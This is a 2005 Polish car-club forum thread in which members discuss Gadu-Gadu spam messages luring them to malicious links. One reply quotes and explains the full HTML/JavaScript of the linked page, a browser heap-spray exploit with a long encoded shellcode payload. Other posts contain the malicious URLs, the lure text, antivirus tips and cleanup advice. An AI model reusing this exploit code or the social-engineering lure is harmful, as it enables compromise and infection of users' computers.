MB/8 Club Poland - Klub i forum miłośników samochodów Mercedes-Benz :: Czyżby wirus?

MB/8 Club Poland - Klub i forum miłośników samochodów Mercedes-Benz https://forum.w114-115.org.pl/

Czyżby wirus? https://forum.w114-115.org.pl/viewtopic.php?f=1&t=15844	Strona 1 z 2

Autor:	Rad.ek [ wt gru 13, 2005 9:40 pm ]
Tytuł:	Czyżby wirus?
JEŚLI NIE JESTEŚ DOBRY W TEMACIE NIE OTWIERAJ TEJ STRONY Wczoraj dostałem na GG wiadomość: 23:00:24 GG# 9706867 mam na imie Karolina,znalazlam cie na fotka.pl jestes zajebisty,chce cie poznac! moja fotka jest tutaj http://iframebiz.biz/dl/adv435.php http://iframebiz.biz/dl/adv435.php Oczywiście z czystej ciekawości kto mi odwalił numer i wkleił moje zdjęcie gdzieś na necie otworzyłem. Oprócz zablokowania przeglądarki nic nie zauważyłem (wyskoczyło okno, klikałem "anuluj"). Czy ktoś bardziej kumaty mógłby sprawdzić co to za strona i co mogła zrobić w moim kompie. Z góry dzięki

Autor:	blaszek [ wt gru 13, 2005 9:49 pm ]
Tytuł:
Ja dostałem coś takiego "Siema jestem Tomek... poznałem Cię przed szkołą fajny z Ciebie gość jak mnie nie pamiętasz to zobacz sobie moje zdjęcia które są tutaj: LINK <-- Sorki musze lecieć pogadamy później" Rownież z czystej ciekawości zobaczyłem co to za "leszcz" od razu NORTON = TROJAN...

Autor:	Rad.ek [ wt gru 13, 2005 9:50 pm ]
Tytuł:
blaszek pisze: od razu NORTON = TROJAN... Mam AVASTa i kerio ale żaden się nie odezwał

Autor:	VALENTINE123 [ wt gru 13, 2005 9:57 pm ]
Tytuł:
Jaki polecacie program antyvirusowy .Ja mam Nortona ,ale nie jestem z niego zadowolony .Już kilka razy scanowałem pliki ,które miały zawierać trojany i nic nie wykrył.

Autor:	nimnod [ wt gru 13, 2005 10:58 pm ]
Tytuł:
Skrypt php po otwarciu strony otwiera kolejną, a oto jej zawartość (w postaci niegroźnej): Strona ponizsza dla niezorientowanych oprocz standarowych znacznikow HTML czyli języka w jakim pisane są strony WWW zawiera funkcje napisane w jezyku skryptowym JavaScript. Wywolywana jest petla powtorzona 500 razy w obrębie ktorej powtornie wykonywana jest jedna funkcja, ktorej definicji nie znam niestety, a że nie jest zdefiniowana w tym pliku, wnioskuje ze jest to funkcja biblioteczna JS. Widac wyraznie ze wartosc zwrocona przez tą funkcje jest w sposob ciagly dodawana do jednej zmiennej, co nieuchronnie prowadzi do przepelnienia jej pojemnosci czyli zjawiska fachowo zwanego przepelnieniem bufora. To co nastepuje dalej to nadpisywanie nie przydzielonych tej zmiennej obszarow pamięci. Nastepnie wartosc zmiennej EIP (dziwna zbieżność z nazwa rejestru) dodawana jest do zmiennej fillmem, ktora z kolei na moje oko jest niczym innym niz zwyklym szelkodem (wybaczcie, ale nie znam polskiego odpowiednika), czyli binarnym ciagiem instrukcji, ktore zostaną wykonane JAK KAZDY inny program, jesli "trafią" na newralgiczny segment pamieci, a to miala sie zatroszczyc petla Reasumując, nie jestem w stanie powiedziec co ów szelkod ma wykonac, ale na pewno nic pozytecznego, w przypadku JESLI uda sie mu trafic na odpowiednie rejestry cel atakującego zostanie osiągniety, w innych przypadkach nastapi zawiecha albo przegladarki albo kompa. Czyli gosciu sobie siedzi i na chybił/trafił poluje na ludzikow, ktorzy podpasują mu konkretną wersja danej przeglądarki, gdyż na tym włąsnie opiera sie skutecznosc poniższego skryptu - błędów w konkretnych wersjach. Sorry za przydługiego posta. Oby sie przydało. Pozdrawiam, Nimnod -------------------------------------------------------- <!-- X-URL: http://iframebiz.biz/dl/fillmemadv435.htm --> <!-- Date: Wed, 14 Dec 2005 05:25:32 GMT --> <!-- Last-Modified: Sun, 11 Dec 2005 08:00:39 GMT --> <BASE HREF="http://iframebiz.biz/dl/fillmemadv435.htm"> <HTML> <HEAD> <Script Language="JavaScript"> function load() { var spearson=0 var eip = "" var fillmem = "" for (spearson=1 ; spearson <=500 ; spearson++) { eip = eip + unescape("%u7030%u4300") } for (spearson=1 ; spearson <=200; spearson++) { fillmem = fillmem + eip } fillmem = fillmem + unescape ("%uEED9%uD99B%u2474%u5EF4%uC02B%u082D%uFFFB%u2BFF"+ "%u60E0%uEC8B%uED83%u8BE0%u2BFD%u81C9%u6CE9%uFFFB"+ "%uF3FF%u2BA4%u2DC0%uFFD2%uFFFF%uC503%uE0FF%uDD8B"+ "%uC92B%uE981%uFEEC%uFFFF%u7381%uA944%u4A67%u83CC"+ "%uFCEB%uF4E2%u7541%uCC48%uEAA9%uD6FF%u67AA%u414A"+ "%uF314%uCC4E%u8FA9%uCE25%u67A9%u4E45%u661F%uCC4A"+ "%u27C3%uCC22%u6799%uA44A%u6351%uCC4A%u67C3%u59B5"+ "%u6305%uCC4A%uA7A2%u4845%u6633%uCC4A%uE220%uC8BE"+ "%u67A9%u39C1%u8F22%u34C1%u9F10%uCC4E%u94A9%u41EE"+ "%uF02C%uCC4A%u98A9%uA6AA%u0FAD%uFC4A%u67A9%uCC22"+ "%u66A9%uA64A%u98A9%u60DF%u67AD%uC74A%u6869%uAFCE"+ "%u67A8%u454A%u8B2C%uCC4E%uEAA9%u25CF%u67AA%u9C4A"+ "%uF256%uC8EE%u67A9%u0C41%uE3A6%uCD02%u67A9%u79C7"+ "%u643F%uCC4A%uDA24%uC8F6%u67A9%u26A2%u67A8%uC34A"+ "%u562B%uCC4B%u0DA9%uA64A%u0DA9%uA64A%uEAA9%u35CF"+ "%u67AA%u9C4A%uF256%uC8F6%u67A9%u0C41%uE3A6%uCD5E"+ "%u67A9%u49C3%u6371%uCC4A%u67C3%uCC20%u64C3%uCC20"+ "%u67C3%u9C20%uE224%uC801%u67A9%u471A%uBF2C%uCC4E"+ "%u37A9%u59B5%u636D%uCC4A%uA7A2%u4845%u674F%uCC4A"+ "%uE220%uC896%u67A9%uCD20%u67C1%u8C4A%u0DA9%uA64A"+ "%u0DA9%u414A%u042C%uCC4E%u37A9%u49C7%u645C%uCC4A"+ "%uECF9%u10CF%u67AD%u9C4A%uF256%uC882%u67A9%u0C41"+ "%uE3A6%uCCFA%u67A9%u49C3%u6349%uCC4A%u67C3%uCC20"+ "%u67C3%uCC20%uE222%uC8AA%u67A9%u331A%uAB3C%uCC4E"+ "%u6CA9%uC38A%uEA2D%uCC4A%uEEA9%u28CF%u67AD%u414A"+ "%u8F2C%uCC4E%u37A9%u3322%u6756%u474A%u8B2C%uCC4E"+ "%u37A9%u49C1%u6349%uCC4A%u98F9%u0CDF%u67AD%uC74A"+ "%u1369%u4796%u8F2C%uCC4E%u6CA9%uB88A%uEA7B%uD6FF"+ "%u67AA%uA44A%u66A9%uCC4A%u98FF%u78DF%u67AD%u414A"+ "%u1C2C%uCC4E%u37A9%u331C%uDF3C%uCC4E%uECA9%u7492"+ "%u67AB%uCC4A%u5241%uCC4A%uECA9%u20F7%u67AD%u474A"+ "%u8F1C%uCC4E%u8FA9%uCC03%u67A9%u49C1%u6379%uCC4A"+ "%u98F9%u6CDF%u67AD%uA64A%uEAA8%uD6CF%u67AA%u9C4A"+ "%uF256%uC8FA%u67A9%uCC20%uF256%uC8E2%u67A9%uA62A"+ "%u0FA9%uCCCA%u67A9%uA61A%u0DA9%uA449%u67A9%u0C4A"+ "%u98FA%u58DF%u67AD%u454A%uB72C%uCC4E%uEEA9%uE80E"+ "%u06B5%uAC89%u67C3%u9A1E%u98FE%u1CFF%u67AD%u334A"+ "%uFB3C%uCC4E%uEEA9%uE80E%u06B5%uAC89%u00CD%uCCEB"+ "%u27A9%u47D9%u98EA%uB90A%uEC50%uCF11%uF4CF%u4D2C"+ "%u2A92%uB810%uE6B3%uCCA1%u66A9%uAA4A%u5C28%u9607"+ "%u6ADD%u27CB%u67A9%uCC4B%uE6CF%u8171%u12F3%u45B9"+ "%u43F5%uAD56%u076A%u1E79%uE7FF%uCC74%u75DD%uB8EC"+ "%u2551%u9D71%u10B1%uFF5C%u2869%uB9E4%u3954%u24A1"+ "%uEEEF%uE83E%uEEA1%uE81E%u9F89%uAD12%u9E6A%u0B12"+ "%u43ED%uCC56%u67A9%uAD4A%u076A%u14C1%u2C22%u4776"+ "%u6CE5%uCF32%uEC62%uEC1B%uB4AA%uF6C1%u9CAA%uA61D"+ "%u8F56%u33E5%u9856%uE138%u20F6%u471D%u43F8%u1F49"+ "%uD0A6%u8E5E%u2622%uCF56%uEC6A%u5C4E%uA4AA%u471C"+ "%u43DD%u4546%uD9AD%u4714%u43D5%u4C4E%u6797%u1D3F"+ "%u3FF1%uADB2%u9E6A%u9412%uA4C8%uBE09%u06CC%uA93E"+ "%u0EEF%uA926%u67E8%uA919%u21DD%uA023%u37CC%uA525"+ "%u13C7%uBE2F%u30A9%uA538%u02DD%uA50C%u02C5%u8F4A"+ "%u08C5%uA939%u06E1%uA824%u02C5%u804A%u06C6%u802E"+ "%u05C0%uAD38%u1EDB%uCC0B%u1FEC%uB823%u15F9%uAF25"+ "%u14CC%uCC39%u0EFF%uB838%u06DC%u8D26%u0BC5%uAF25"+ "%u30A9%uA223%u1FEC%uAF2F%u20A9%uB82F%u1EFA%uB839"+ "%u0ACC%uA50E%u02DB%uB829%u15C6%u8D33%u0BA9%uB839"+ "%u04DB%uB82B%u67A9%uA203%u02DD%uA238%u13CC%uBC05"+ "%u09CC%uCC0B%u09E0%uA93E%u09DB%uB82F%u02FB%uA82B"+ "%u0EEF%uA926%u2EA9%uB824%u15CC%uA924%u24DD%uA225"+ "%u02C7%uB829%u67E8%uB802%u17DD%uBC05%u09CC%uA918"+ "%u12D8%uBF2F%u26DD%u844A%u13DD%u9F3A%u09CC%u9E2E"+ "%u16CC%uA93F%u13DA%uCC0B%u10A9%uA223%u09C0%uB82F"+ "%u0387%uA026%u20A9%u980F%u2AA9%uB625%u0BC0%uAD26"+ "%u5386%uFC64%u4F89%uA329%u17C4%uB82B%u05C0%uA926"+ "%u4792%u9F07%u22E0%uFA6A%u5787%uEC71%u0EFE%uA824"+ "%u10C6%uEC39%u33E7%uF96A%u5687%uEC71%u31FA%uF77B"+ "%u2A89%u8533%u55EC%uEC71%u2987%u980F%u2489%u9E06"+ "%u5689%uFD64%u5387%uFE79%u4E9B%uA54A%u15CF%uA12B"+ "%u05CC%uB623%u0587%uB623%u67A9%uCC4A%u67A9%uCC4A"+ "%u67A9%uE34A%u0BCD%uA065%u06C6%uA92E%u06DB%uBA2E"+ "%u549D%uE27F%u1FCC%uCC2F%u67A9%u904A%u04DA%uB827"+ "%u5198%uA964%u02D1%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+ "%u67A9%u5C4A") prompt(fillmem, fillmem) } </Script> </head> <body onload="setTimeout('load()',500)"> </body> </HTML>

Autor:	lukasz 200 [ śr gru 14, 2005 8:06 am ]
Tytuł:
Takie wiadomości sa rozsyłane z tego co widzę po całym kraju. Nie wiem czy przez jedna osobę,czy przez grupe . Podobno administrator GG czy ktos taki miałby się tym zając ale czy to prawda to nie wiem.Średnio raz dziennie otrzymuje taka wiadomośc na GG. Cytuj: Jaki polecacie program antyvirusowy . Ja mam Anti Vir XP.Firmy Datentechnik GmbH. Program użytkuje od roku ,aktualizuje na bierząco. Nic mi się dziwnego nie wydarzyło odkąd go mam. Wczesniej miałem Nortona ,przez 3 dni dokąd nie padł komputer.

Autor:	Mar3ko [ śr gru 14, 2005 8:29 am ]
Tytuł:	Re: Czyżby wirus?
Rad.ek pisze: JEŚLI NIE JESTEŚ DOBRY W TEMACIE NIE OTWIERAJ TEJ STRONY Wczoraj dostałem na GG wiadomość: 23:00:24 GG# 9706867 mam na imie Karolina,znalazlam cie na fotka.pl jestes zajebisty,chce cie poznac! moja fotka jest tutaj http://iframebiz.biz/dl/adv435.php http://iframebiz.biz/dl/adv435.php Oczywiście z czystej ciekawości kto mi odwalił numer i wkleił moje zdjęcie gdzieś na necie otworzyłem. Oprócz zablokowania przeglądarki nic nie zauważyłem (wyskoczyło okno, klikałem "anuluj"). Czy ktoś bardziej kumaty mógłby sprawdzić co to za strona i co mogła zrobić w moim kompie. Z góry dzięki Wczoraj dostałem też wiadomość z tego samego numeru, właśnie sprawdziłem, ale mi pisało, że ktoś tam wygrał jakąś nagrodę i żebym wszedł na strone zobaczyć wyniki jakiegoś głosowania. Ale nei wszedłem na szczęście tylko wywaliłem...

Autor:	blaszek [ śr gru 14, 2005 8:53 am ]
Tytuł:
No nieźle: Sprzed chwili: Pod chwilą emocji nie wiedziałem czym postraszyć "9703095 8:51:22 Witam Łukasz 8:51:33 cześć 9703095 8:51:35 mam na imie Karolina,znalazlam cie na fotka.pl jestes zajebisty, chce cie poznac! moja fotka jest tutaj http://85.255.113.242/adv/121/ Łukasz 8:52:06 już i tak Twoje numery są na policji"

Autor:	_me: how_ [ śr gru 14, 2005 1:34 pm ]
Tytuł:
Ciekawe, ciekawe. Ja wczoraj miałem tylko "cześć", niestety nie archiwizuję GG na jednym z komputerów, ale pamiętam, że numer był wysoki i zaczynał sie na 9. Mówicie, że to ogólny trend na GG, czy może ktoś poluje na forumowiczy?

Autor:	wojz [ śr gru 14, 2005 1:44 pm ]
Tytuł:
Ogólny trend. Te wiadomości wysyłane są z bardzo wielu numerów gg (np 8054836 ,9503306, 9503409, 7664158, 8005996, 5845387 i z każdą chwilą jest ich więcej). Dostaję je (chyba dwa razy jak dotąd) tylko na jeden nr gada - taki, na którym jestem zawsze widoczny i dla każdego. Inne numery, z zaznaczonym "tylko dla znajomych" i na których zawsze się czaję nie są nękane .

Autor:	harrier [ śr gru 14, 2005 1:57 pm ]
Tytuł:
VALENTINE123 pisze: Jaki polecacie program antyvirusowy Ja polecam pod 'łindołsa' Avast'a: http://www.avast.pl/ Ja jeszcze nie dostałem takiej wiadomości na GG. Były kiedyś jakieś głupoty na temat stronki z dzwonkami polifonicznymi, które koniecznie muszę mieć... olałem. Pozdrawiam,

Autor:	kruszyn [ śr gru 14, 2005 3:20 pm ]
Tytuł:
hmmm ja robie takich komputerkow dziennie kolo 4 .. dobry sposob ma wyczyszczenie podlaczyc dysk z takiego kompa pod drugiego i wystarczy p[rzeskanowac samym mks-on line .. wywali 99% smieci z tym ze po takiej zbawie czesto jest potrzebna instalacja ,,naprawcza,, systemu bo potrafi wywalic kilka wpisow i plikow systemowych skojarzonych z trojanami ... Po takim czyszczeniu i ustawieniu systemu zainstalowac( najlepiej xp +sp2) avas + noadware3.0 polecam bo sie sprawdza. Jeden program nie pomoze no i trzeba patrzec co sie akceptuje .. Przy innych smieciach typu ,,spyware detect,, dla fanow poszukiwania rozwiazan proponuje zabawe z wyszukaniem plikow tzw ,,falszywej tapety,, ( czaslochlonne z marnym efektem) albo przeinstalowac system na zasadzie opcji instalacji systemu windows ,,pozostaw system plikow bez zmian,, --> usun katalog windows... Wiem ze mozna sie bawic w naprawe systemu ale patrzac ze szukanie wirusa zajmie nam 4h i i tak cos zostanie w systemi a reinstalacja nawet z pelnym formatem 3h to ja wybieram opcje 2 przy wczesnijeszym zabezpieczeniu danych oczywiscie !!! pozdrawiam

Autor:	Omen [ śr gru 14, 2005 5:01 pm ]
Tytuł:
Ja też to dostałem !!! Włączyłem i musiałem Windowsa od nowa instalować

Autor:	roadrunner [ śr gru 14, 2005 5:29 pm ]
Tytuł:
Z antywirow ostatnio testuje Nortona internet Security 2006 pakiet jes poprawiony mocno wzgledem poprzednika i zaczynami sie podobac, poprzednio używalem kasperskiego w sumie też dobry ale czasem sie wywala prze graniu w sieci!!!

Autor:	Rad.ek [ śr gru 14, 2005 8:44 pm ]
Tytuł:
Ktoś mi powiedział (laik jak ja, też gdzieś słyszał) że ten program/strona dłubie coś w GG by sam się dalej rozsyłał z twojej książki. Może to coś pomoże. Dzięki za odpowiedż choć za dużo nie zrozumiałem . W razie czego jak przeinstalować windę by nie tracić danych czy "saveów" z gier? W linuksie takich problemów nie ma . P.S. Widział ktoś tlen na linuxa, w nie sprawiającej problemów (instalacja) wersji?

Strona 1 z 2	Strefa czasowa UTC+02:00
Powered by phpBB® Forum Software © phpBB Limited https://www.phpbb.com/